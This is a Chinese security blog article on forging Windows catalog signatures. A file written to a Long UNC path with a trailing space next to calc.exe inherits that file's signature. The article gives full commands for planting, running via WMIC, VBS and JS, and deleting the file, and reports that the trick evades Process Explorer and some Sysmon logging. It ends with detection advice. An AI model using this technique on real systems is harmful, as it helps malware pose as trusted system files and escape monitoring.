Catalog签名伪造——Long UNC文件名欺骗
0x00 前言
在之前的两篇文章《Authenticode签名伪造——PE文件的签名伪造与签名验证劫持》和《Authenticode签名伪造——针对文件类型的签名伪造》介绍了Authenticode签名伪造的利用方法,这次将要介绍一个Catalog签名伪造的方法,利用Long UNC文件名欺骗系统,获得系统内置的Catalog签名
注:
本文介绍的技巧参考自Matt Graeber@mattifestation公开的资料,本文将结合自己的经验,整理相关内容,添加个人理解。
参考资料:
http://www.exploit-monday.com/2013/02/WindowsFileConfusion.html?m=1
0x01 简介
本文将要介绍以下内容:
- Long UNC基础知识
- Long UNC文件名欺骗的方法
- Long UNC文件名欺骗优缺点分析
0x02 Long UNC介绍
UNC(Universal Naming Convention)
通用命名规则,可用来表示Windows系统中文件的位置
详细介绍可参考如下链接:
https://en.wikipedia.org/wiki/Path_(computing)
Long UNC
正常UNC支持的最大长度为260字符
为了支持更长的字符,引入了Long UNC,支持最大长度为32767
格式举例: \\?\C:\test\a.exe
type putty.exe > "\\?\C:\test\longUNC.exe"
如下图,使用Long UNC的文件同普通文件没有区别
特别用法:
如果在Long UNC文件名后面加一个空格,系统对文件名的判断将发生错误
type putty.exe > "\\?\C:\test\mimikatz.exe "
如下图
将putty.exe重命名为"\\?\C:\test\mimikatz.exe ",右键查看"\\?\C:\test\mimikatz.exe "的文件属性
发现了奇怪的地方:属性显示该文件为样本文件mimikatz.exe的属性
直观理解:特殊Long UNC的文件能够欺骗系统,将其识别为另一个文件
0x03 Long UNC文件名欺骗的方法
由上节测试,我们知道利用Long UNC能够复制文件属性
那么,如果复制的是系统文件,甚至是带有catalog签名的文件,是否能实现catalog的签名伪造?
测试1: 伪造calc.exe的catalog签名
测试系统: Win7 x86
使用sigcheck.exe查看calc.exe的catalog签名:
sigcheck.exe -i c:\windows\system32\calc.exe
如下图
Long UNC文件伪造:
type putty.exe > "\\?\C:\Windows\System32\calc.exe "
注:
输出到c:\windows\system32\需要管理员权限
特殊文件名必须放在目标的同级目录下,即C:\Windows\System32,否则启动失败
如下图,验证结论,特殊Long UNC能够复制文件属性
在之前的文章《Hidden Alternative Data Streams的进阶利用技巧》介绍过特殊文件名可用短文件名代替
获取短文件名:
dir /x calc*.exe
如下图
"\\?\C:\Windows\System32\calc.exe "可用短文件名CALC~1.EXE代替
使用sigcheck.exe查看该文件的catalog签名:
sigcheck.exe -i "\\?\C:\Windows\System32\calc.exe "
or
sigcheck.exe -i C:\Windows\System32\CALC~1.EXE
如下图
成功伪造catalog签名
测试2: 执行特殊Long UNC文件
1、无法双击执行
2、通过命令行
"\\?\C:\Windows\System32\calc.exe "
提示系统找不到指定的路径
C:\Windows\System32\CALC~1.EXE
启动正常calc.exe
3、通过WMIC
wmic process call create C:\Windows\System32\CALC~1.exe
4、通过vbs
Set objShell = CreateObject("Wscript.Shell")
objShell.Run "c:\windows\system32\calc~1.exe"
5、通过js
var wsh=new ActiveXObject("wscript.shell");
wsh.run("c:\\windows\\system32\\calc~1.exe");
启动后,进程名为calc~1.exe
特别的地方:
通过Process Explorer验证进程签名,识别为calc.exe的默认微软证书
如下图
注:
关于文件的描述,例如截图中的"SSH, Telnet and Rlogin client"可通过修改程序的资源进行伪造,方法暂略
得出结论: 执行特殊Long UNC文件能够欺骗Process Explorer的进程签名验证
补充:
能够欺骗Sysmon的部分日志监控功能,例如Process creation
测试3: 无法欺骗的工具
1、使用certutil.exe计算MD5
certutil.exe -hashfile C:\Windows\System32\calc.exe MD5
certutil.exe -hashfile C:\Windows\System32\calc~1.exe MD5
注:
certutil.exe -hashfile "\\?\C:\Windows\System32\calc.exe " MD5
报错提示系统找不到文件
如下图
测试4: 多个同名文件夹的生成
type putty.exe > "\\?\C:\Windows\System32\calc.exe "
type putty.exe > "\\?\C:\Windows\System32\calc.exe "
type putty.exe > "\\?\C:\Windows\System32\calc.exe "
如下图
测试5: 特殊Long UNC文件的删除
del "\\?\C:\Windows\System32\calc.exe "
or
del C:\Windows\System32\CALC~1.exe
测试6: 其他系统测试
支持Win7-Win10
64位系统需要注意重定向问题
0x04 利用分析
利用特殊Long UNC文件名欺骗系统对文件路径的判断,实现伪造catalog签名
特点:
欺骗系统对文件名的检查,将文件伪造成系统文件,伪造catalog签名
防御检测:
1、权限控制
欺骗系统文件,需要有系统文件夹的可写权限
2、文件识别
同级目录同名文件
3、进程名判断
特殊进程名,格式为短文件名,例如CALC~1.EXE
4、工具检测
使用certutil.exe校验文件hash
0x05 小结
本文介绍了利用特殊Long UNC文件名欺骗系统并获得Catalog签名的技巧,分析利用方法,分享防御思路